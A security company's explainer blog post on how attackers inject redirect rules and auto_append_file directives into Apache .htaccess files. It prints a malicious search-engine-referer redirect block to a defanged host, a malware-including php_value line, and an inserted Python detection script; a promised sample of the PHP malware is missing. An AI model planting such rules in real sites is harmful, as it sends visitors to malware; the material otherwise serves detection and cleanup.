Experts Explain: .htaccess Attacks




This is the fifth part in our series of posts here at StopTheHacker where we describe the various methods that malicious hackers use to infect benign and legitimate websites with web-malware.

In this article we will talk about a very popular attack method used to infect legitimate websites: .htaccess redirection. This technique is used by hackers to redirect users visiting compromised websites to content on another infected or imposter website.



What is the purpose of the .htaccess file?



Websites are powered by software called a “web server”. A web server takes requests for web pages from browsers such as Internet Explorer, Google Chrome, or Firefox and sends the requested pages back to the visitor. There are many different web servers, including IIS, NGINX, and Apache, to name a few; the most popular is Apache.

Many web servers support a special per-directory configuration file. On Apache, this file is named “.htaccess”. It specifies rules that determine how, and to whom, your website's content is served. For example, it can be used to stop users from viewing certain pages, or to redirect users to a specific page when they request a page that is under construction.



How are .htaccess files used?



The .htaccess file can help you configure how users access pages on your website, whether they can view the contents of certain directories, whether specific web page requests are redirected to error pages (error 404 – not found) and more.

Webmasters often use .htaccess files to block web crawlers, automated spiders and malicious bots from viewing the website content. .htaccess files can also be used to prevent “hotlinking” of images on sites, as in the rules below.

    RewriteEngine on
    # Allow requests with an empty Referer (direct visits, some browsers)
    RewriteCond %{HTTP_REFERER} !^$
    # Allow requests referred from this site itself (case-insensitive)
    RewriteCond %{HTTP_REFERER} !^http://(www\.)?mysite\.com/.*$ [NC]
    # Anything else asking for an image gets 403 Forbidden
    RewriteRule \.(png|gif|jpg)$ - [F]


How is the .htaccess file used by malicious hackers?



Using the .htaccess file, hackers can redirect your visitors to another website. Malicious hackers often inject malicious lines into an otherwise benign .htaccess file. These lines can send visitors to malware and cause user confusion.

Before inserting the malicious code into .htaccess files, hackers will sometimes prepend a number of empty lines to make the malicious entries more difficult to notice. Ensure that you search the entire “.htaccess” file for malware, not just the lines at the top.



What does a .htaccess file look like?



A good example of the .htaccess file can be found here and here.

An example:

    ### BASIC PASSWORD PROTECTION ###
    #AuthType basic
    #AuthName "prompt"
    #AuthUserFile /.htpasswd
    #AuthGroupFile /dev/null
    #Require valid-user

    ### ALLOW FROM IP OR VALID PASSWORD ###
    #Require valid-user
    #Allow from 192.168.1.23
    #Satisfy Any

    ### PROTECT FILES ###
    #<FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$">
    #  Order Allow,Deny
    #  Deny from all
    #</FilesMatch>

    ### PREVENT HOTLINKING ###
    #SetEnvIfNoCase Referer "^http://subdomain.domain.tld/" good
    #SetEnvIfNoCase Referer "^$" good
    #<FilesMatch "\.(png|jpg|jpeg|gif|bmp|swf|flv)$">
    #   Order Deny,Allow
    #   Deny from all
    #   Allow from env=good
    #   ErrorDocument 403 http://www.google.com/intl/en_ALL/images/logo.gif
    #   ErrorDocument 403 /images/you_bad_hotlinker.gif
    #</FilesMatch>

    ### LIMIT UPLOAD FILE SIZE TO PROTECT AGAINST DOS ATTACK ###
    #LimitRequestBody 10240000 #bytes, 0-2147483647(2GB)


How can I identify if my .htaccess file is infected?



Malicious code in an .htaccess file can look similar to the example below. Notice that the “RewriteRule” statement tells the web server to send visitors to “hxxp://sokoloperkovuskeci.com/in.php” for any request whose Referer matches one of the “RewriteCond” statements.

This means visitors from many common search engines, including Ask, Google, MSN, and more, would be redirected to a malicious website.


    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*excite.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*search.yahoo$ [NC]
    RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php[removed] [R,L]
    </IfModule>


Popular .htaccess attacks have directed users to: xccgtswgokoe, villusoftreit.ru, and globalpoweringgatheringon.com.

Another technique uses the .htaccess file to set the PHP option “auto_append_file” so that a local file containing the malware is included with every PHP request. Instead of redirecting visitors, the .htaccess file is used to load malware from another local file and serve it to users.

An example:

    php_value auto_append_file "/tmp/661829.php"

This configuration appends the malware contained in the file “/tmp/661829.php” to every PHP request.
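As an added example (not code from the original post), the following Python checker applies the three indicators this article describes to an .htaccess body: blank-line padding ahead of the real directives, a RewriteRule that sends visitors to a different host after search-engine Referer conditions, and php_value auto_append_file / auto_prepend_file directives. The sample .htaccess, the host name redirect-target.example, the own_hosts parameter and the 10-line padding threshold are all constructed assumptions for the demo.

```python
import re

# Constructed sample .htaccess for this demo: 40 padding lines, then a
# search-engine-conditioned redirect and an auto_append_file directive.
SAMPLE_HTACCESS = "\n" * 40 + """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com$ [NC]
RewriteRule .* http://redirect-target.example/in.php [R,L]
php_value auto_append_file "/tmp/661829.php"
"""

SEARCH_ENGINES = ("ask.com", "google", "msn", "bing", "live.com", "aol",
                  "altavista", "excite", "yahoo")
COND_RE = re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"RewriteRule\s+\S+\s+(https?://([^/\s]+)\S*)", re.I)
PHP_RE = re.compile(r"php_(?:admin_)?value\s+auto_(?:append|prepend)_file\s+(.+)", re.I)

def scan_htaccess(text, own_hosts=()):
    """Return (kind, line_no, detail) findings for an .htaccess body."""
    findings = []
    lines = text.splitlines()
    leading = next((i for i, l in enumerate(lines) if l.strip()), len(lines))
    if leading >= 10:  # padding used to push malicious lines out of view
        findings.append(("padding", 1, f"{leading} blank lines before the first directive"))
    conds = []  # line numbers of search-engine Referer conditions before the next rule
    for no, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if m := COND_RE.match(line):
            if any(e in m.group(1).lower() for e in SEARCH_ENGINES):
                conds.append(no)
            continue
        if line.lower().startswith("rewriterule"):
            m = RULE_RE.match(line)
            # An absolute URL target is an external redirect even without [R]
            if m and m.group(2).lower() not in own_hosts:
                how = (f"conditioned on search-engine referers at lines {conds}"
                       if conds else "unconditional")
                findings.append(("external-redirect", no, f"{m.group(1)} ({how})"))
            conds = []  # a RewriteCond chain applies only to the next RewriteRule
            continue
        if m := PHP_RE.match(line):
            findings.append(("php-include", no, m.group(1).strip().strip('"\'')))
    return findings

if __name__ == "__main__":
    for kind, no, detail in scan_htaccess(SAMPLE_HTACCESS, own_hosts=("www.example.com",)):
        print(f"line {no}: {kind}: {detail}")
```

Run it against a copy of a server's .htaccess (for example, `scan_htaccess(open(".htaccess").read(), own_hosts=("www.yoursite.com",))`) and compare the result with the backup copy the article recommends keeping.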

The PHP file could contain malware that resembles the example below:



How do I detect if my site is vulnerable?



Monitor your site for unexpected redirects, and always keep backups of your .htaccess files so you can compare them with the copies on your server.

Additionally, you should scan your website for application level vulnerabilities like SQL injection and Cross Site Scripting issues. These are all security holes that malicious hackers can exploit to break into your site and infect it, spreading malware to your visitors.



Conclusion



.htaccess redirection is a common vector for malicious hackers to exploit and infect websites. We have seen what .htaccess files are, how they are used by malicious hackers, and how to protect your website.

StopTheHacker.com customers have access to resources and services that protect them against these kinds of threats and help them recover from compromises should they occur. If you would like more information on how to protect your website, please feel free to contact us.